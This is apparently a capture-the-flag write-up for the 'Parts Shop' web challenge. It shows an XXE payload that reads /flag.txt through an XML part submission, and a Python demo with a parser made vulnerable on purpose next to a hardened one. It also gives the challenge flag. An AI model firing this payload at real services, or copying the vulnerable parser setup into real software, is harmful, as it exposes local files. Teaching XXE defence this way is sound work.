Parts Shop

Description

Parts Shop [Web]

We've found an online shop for robot parts. We suspect ARIA is trying to embody itself to take control of the physical world. You need to stop it ASAP! (Note: The flag is located in /flag.txt)

https://uscybercombine-s4-parts-shop.chals.io/

Solution

The app allows us to view and add parts:

Add test item:

The image field is embedded into the page and accepts a URL, so the server fetches whatever we point it at.

Since the flag sits at /flag.txt, the first idea is to point the image at a file:// URL and read the file through that field (a local file inclusion style bug).

New parts are submitted to the server as an XML document:

The file:// scheme is rejected for the image URL, so that route is closed:

Since the request body is XML, the next thing to try is XML External Entity (XXE) injection: declare an external entity in a DOCTYPE that points at the file, then reference it inside one of the fields so the server's parser expands it and stores the file's contents as part of the item.

https://github.com/swisskyrepo/PayloadsAllTheThings/blob/master/XXE%20Injection/README.md

Payload:

<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE name [<!ENTITY flag SYSTEM 'file:///flag.txt'>]>
<part>
  <name>&flag;</name>
  <author>test2</author>
  <image>test3</image>
  <description>test4</description>
</part>
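
Why this works, as an added illustration that is not part of the original writeup and not the shop's own code (its parser is unknown): the Python script below reproduces the bug with the standard library's xml.sax parser, which resolves external general entities only when feature_external_ges is switched on. It writes a constructed flag to a temporary file instead of /flag.txt, feeds the payload above to a deliberately vulnerable parser and to a hardened one that refuses any DOCTYPE, and returns what each did. The FLAG value, the temporary file and the function names are assumptions for the demo.

```python
import io
import os
import pathlib
import tempfile
import xml.sax
from xml.sax import handler

# Constructed stand-in for /flag.txt; the real challenge flag is not used here.
FLAG = "SIVBGR{c0nstructed_fl4g}"


def build_payload(file_url: str) -> bytes:
    """The writeup's payload, with the SYSTEM URL parameterised for the demo."""
    return f"""<?xml version="1.0" encoding="UTF-8"?>
<!DOCTYPE part [<!ENTITY flag SYSTEM '{file_url}'>]>
<part>
  <name>&flag;</name>
  <author>test2</author>
  <image>test3</image>
  <description>test4</description>
</part>""".encode()


class PartHandler(handler.ContentHandler):
    """Collects the text of each child element of <part> into a dict."""

    def __init__(self):
        super().__init__()
        self.fields = {}
        self._current = None
        self._buf = []

    def startElement(self, name, attrs):
        if name != "part":
            self._current, self._buf = name, []

    def characters(self, content):
        # Called for literal text and for expanded entity text alike,
        # which is exactly why &flag; ends up inside the stored name.
        if self._current is not None:
            self._buf.append(content)

    def endElement(self, name):
        if name == self._current:
            self.fields[name] = "".join(self._buf)
            self._current = None


class RejectDTD:
    """Lexical handler that refuses any DOCTYPE: no DTD, no entity declarations."""

    def startDTD(self, name, public_id, system_id):
        raise ValueError(f"DOCTYPE {name!r} is not allowed in part submissions")

    def endDTD(self):
        pass

    def comment(self, content):
        pass

    def startCDATA(self):
        pass

    def endCDATA(self):
        pass


def parse_part_vulnerable(xml_bytes: bytes) -> dict:
    """Emulates the shop: external general entities are fetched and expanded."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, True)  # the dangerous setting
    h = PartHandler()
    parser.setContentHandler(h)
    parser.parse(io.BytesIO(xml_bytes))
    return h.fields


def parse_part_hardened(xml_bytes: bytes) -> dict:
    """Same parser with entity resolution off and any DOCTYPE rejected outright."""
    parser = xml.sax.make_parser()
    parser.setFeature(handler.feature_external_ges, False)
    parser.setFeature(handler.feature_external_pes, False)
    parser.setProperty(handler.property_lexical_handler, RejectDTD())
    h = PartHandler()
    parser.setContentHandler(h)
    parser.parse(io.BytesIO(xml_bytes))
    return h.fields


def demo():
    """Returns (text leaked by the vulnerable parser, whether the hardened one refused)."""
    with tempfile.TemporaryDirectory() as tmp:
        flag_path = os.path.join(tmp, "flag.txt")  # stands in for /flag.txt
        with open(flag_path, "w", encoding="utf-8") as f:
            f.write(FLAG)
        payload = build_payload(pathlib.Path(flag_path).as_uri())
        leaked = parse_part_vulnerable(payload)["name"]
        try:
            parse_part_hardened(payload)
            blocked = False
        except ValueError:
            blocked = True
    return leaked, blocked


if __name__ == "__main__":
    print(demo())
```

The fix is not "strip file://": any parser that resolves external entities will read local files, URLs or even exfiltrate them out of band, so the durable mitigation is to disable DTD processing (or external entity resolution) in the parser itself, as parse_part_hardened does.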
The part is created and its name field now holds the contents of /flag.txt:

Flag: SIVBGR{fu11y_upgr4d3d}
